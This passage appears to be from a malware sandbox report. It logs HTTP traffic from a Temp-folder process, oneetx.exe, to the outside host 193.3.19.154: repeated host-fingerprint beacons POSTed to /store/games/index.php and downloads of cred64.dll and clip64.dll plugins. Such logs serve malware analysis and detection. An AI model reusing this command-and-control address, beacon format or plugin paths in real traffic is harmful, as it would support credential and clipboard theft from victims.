                  Nov 23, 2024 20:55:14.751076937 CET8049998193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:14.752810955 CET4999880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:14.752942085 CET4999880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:14.877484083 CET8049998193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:18.770957947 CET4999880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:18.881467104 CET5000980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:19.004756927 CET8050009193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:19.004856110 CET5000980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:19.005067110 CET5000980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:19.130290031 CET8050009193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:23.026942968 CET5000980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:23.147197008 CET5001680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:23.266874075 CET8050016193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:23.267155886 CET5001680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:23.267354965 CET5001680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:23.387819052 CET8050016193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:27.284604073 CET5001680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:27.396590948 CET5001780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:27.519185066 CET8050017193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:27.520701885 CET5001780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:27.524590969 CET5001780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:27.644126892 CET8050017193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:31.534796000 CET5001780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:31.646648884 CET5001880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:31.768959045 CET8050018193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:31.769076109 CET5001880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:31.769241095 CET5001880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:31.888921976 CET8050018193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:35.782913923 CET5001880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:35.895593882 CET5001980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:36.015454054 CET8050019193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:36.015582085 CET5001980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:36.015755892 CET5001980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:36.135890961 CET8050019193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:40.001425028 CET5001980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:40.114579916 CET5002080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:40.236881018 CET8050020193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:40.236968040 CET5002080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:40.237325907 CET5002080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:40.359134912 CET8050020193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:44.236221075 CET5002080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:44.347963095 CET5002180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:44.468381882 CET8050021193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:44.468463898 CET5002180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:44.468620062 CET5002180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:44.588114023 CET8050021193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:48.526834011 CET5002180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:48.650610924 CET5002280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:48.772303104 CET8050022193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:48.772412062 CET5002280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:48.775316954 CET5002280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:48.894989967 CET8050022193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:52.784638882 CET5002280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:52.896639109 CET5002380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:53.016299963 CET8050023193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:53.016719103 CET5002380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:53.018945932 CET5002380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:53.139497995 CET8050023193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:57.136096954 CET5002380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:57.300864935 CET5002480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:57.424350977 CET8050024193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:57.424740076 CET5002480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:57.425158978 CET5002480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:57.547476053 CET8050024193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:01.438981056 CET5002480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:01.550828934 CET5002580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:01.671396017 CET8050025193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:01.671538115 CET5002580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:01.674710989 CET5002580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:01.797806025 CET8050025193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:05.680903912 CET5002580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:05.801099062 CET5002680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:05.920730114 CET8050026193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:05.920859098 CET5002680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:05.921580076 CET5002680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:06.041557074 CET8050026193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:09.923228025 CET5002680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:10.034737110 CET5002780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:10.154762030 CET8050027193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:10.154865980 CET5002780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:10.155056953 CET5002780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:10.275922060 CET8050027193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:14.164216995 CET5002780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:14.309473038 CET5002880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:14.429255009 CET8050028193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:14.429358959 CET5002880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:14.447710991 CET5002880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:14.567240000 CET8050028193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:18.455177069 CET5002880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:18.566900015 CET5002980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:18.693553925 CET8050029193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:18.693641901 CET5002980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:18.693800926 CET5002980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:18.816591024 CET8050029193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:22.706672907 CET5002980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:22.819727898 CET5003080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:22.940217972 CET8050030193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:22.945043087 CET5003080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:22.945043087 CET5003080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:23.069458961 CET8050030193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:26.956809998 CET5003080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:27.068814039 CET5003180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:27.188440084 CET8050031193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:27.188760996 CET5003180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:27.188958883 CET5003180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:27.310029030 CET8050031193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:31.204734087 CET5003180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:31.324182034 CET5003280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:31.449716091 CET8050032193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:31.449810982 CET5003280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:31.450035095 CET5003280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:31.569895029 CET8050032193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:35.454541922 CET5003280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:35.566035032 CET5003380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:35.690761089 CET8050033193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:35.694916964 CET5003380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:35.698836088 CET5003380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:35.822062016 CET8050033193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:39.694586992 CET5003380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:39.800750971 CET5003480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:39.921848059 CET8050034193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:39.921938896 CET5003480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:39.922708988 CET5003480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:40.048729897 CET8050034193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:43.907721043 CET5003480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:44.021300077 CET5003580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:44.144025087 CET8050035193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:44.144121885 CET5003580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:44.144380093 CET5003580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:44.266232014 CET8050035193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:48.157989025 CET5003580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:48.285547018 CET5003680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:48.409069061 CET8050036193.3.19.154192.168.2.5
                  Nov 23, 2024 20:56:48.409148932 CET5003680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:48.409323931 CET5003680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:56:48.531388998 CET8050036193.3.19.154192.168.2.5

                  HTTP Request Dependency Graph

                  • 193.3.19.154

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549705193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:00.134437084 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.549704193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:00.156812906 CET68OUTGET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.549706193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:04.372400045 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.549707193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:08.615879059 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.549708193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:09.281379938 CET68OUTGET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.549709193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:12.859211922 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.549712193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:17.093691111 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.549714193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:17.763102055 CET68OUTGET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.549722193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:21.325753927 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.549733193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:25.581552029 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.549735193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:26.236412048 CET68OUTGET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.549741193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:29.815764904 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.549752193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:34.065401077 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.549754193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:34.715946913 CET68OUTGET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.549764193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:38.322386980 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.549775193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:42.546869040 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.549776193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:43.200330019 CET68OUTGET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.549787193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:46.769010067 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.549794193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:51.020618916 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.549804193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:55.310513020 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.549815193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:53:59.532934904 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.549826193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:03.786379099 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.549837193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:08.046710014 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
